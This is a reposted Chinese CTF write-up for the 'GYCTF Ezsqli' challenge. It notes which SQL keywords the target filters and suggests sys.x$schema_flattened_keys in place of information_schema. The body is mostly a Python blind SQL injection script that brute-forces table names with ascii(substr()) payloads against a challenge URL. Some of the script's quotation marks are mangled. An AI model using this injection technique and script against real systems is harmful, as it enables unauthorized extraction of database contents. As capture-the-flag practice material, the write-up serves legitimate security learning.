码迷,mamicode.com
首页 > 数据库 > 详细

GYCTF Ezsqli

时间:2020-02-28 20:40:30      阅读:107      评论:0      收藏:0      [点我收藏+]

标签:ctf   regex   bre   col   sqli   post   code   att   class   

Fuzz 

发现过滤了 and or if information_schema  union+select合起来的时候会过滤,但分开不过滤   过滤了join  regexp 

 考虑盲注  information_schema被过滤,可以换为sys.x$schema_flattened_keys

fuzz的时候,发现如果查询成功的话会回显Nu1L

爆表名

exp:

# -*- coding: UTF-8 -*-
import requests
flag=‘‘
url=http://9ed82b30-6500-472d-af3b-2c380fc65adc.node3.buuoj.cn/index.php
link=0
for i in range(1,50):
    for j in range(32,128):
        payload = "1 && ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),"+str(i)+",1))="+str(j)+"#"
        data={
            id: payload
        }
        res=requests.post(url,data=data)
        if Nu1L in res.text:
            flag=flag+chr(j)
            print(flag)
            link=1
            break

 技术图片

 

GYCTF Ezsqli

标签:ctf   regex   bre   col   sqli   post   code   att   class   

原文地址:https://www.cnblogs.com/tiaopidejun/p/12367855.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!